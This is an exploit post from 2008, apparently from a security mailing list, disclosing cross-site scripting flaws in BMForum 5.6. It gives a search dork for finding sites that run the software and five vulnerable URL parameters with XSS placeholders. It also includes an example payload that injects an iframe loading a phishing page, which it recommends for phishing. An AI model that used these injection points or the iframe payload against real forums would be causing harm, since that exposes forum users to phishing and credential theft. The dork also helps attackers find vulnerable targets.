BMForum Remote 5.6 Miltiple XSS Vulnerability

tan_prathan Thu, 22 May 2008 10:23:48 -0700

==========================================================

      BMForum Remote 5.6 Miltiple XSS Vulnerability


==========================================================



AUTHOR : CWH Underground

DATE   : 22 May 2008

SITE   : www.citec.us



#####################################################

 APPLICATION : BMForum

 VERSION     : 5.6 (Lastest Version)

 VENDOR      : http://downloads.sourceforge.net/bmforum

#####################################################


DORK: "powered by BMForum"


---Exploit---


[-] http://[target]/[BBForum_path]/index.php?outpused=<XSS>

[-] 
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?footer_copyright=<XSS>

[-] 
http://[target]/[BBForum_path]/newtem/footer/bsd01footer.php?verandproname=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?topads=<XSS>

[-] http://[target]/[BBForum_path]/newtem/header/bsd01header.php?myplugin=<XSS>


--- Note ---

 Very Dangerous for using 'IFRAME' TAG for Phishing Techniques

 

 Example: http://[target]/[BBForum_path]/index.php?outpused=<IFRAME 
src=http://phisherpage.com width="900" height="600">

                                                                                
                                                .


##################################################################

# Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C   #

##################################################################

BMForum Remote 5.6 Miltiple XSS Vulnerability

Reply via email to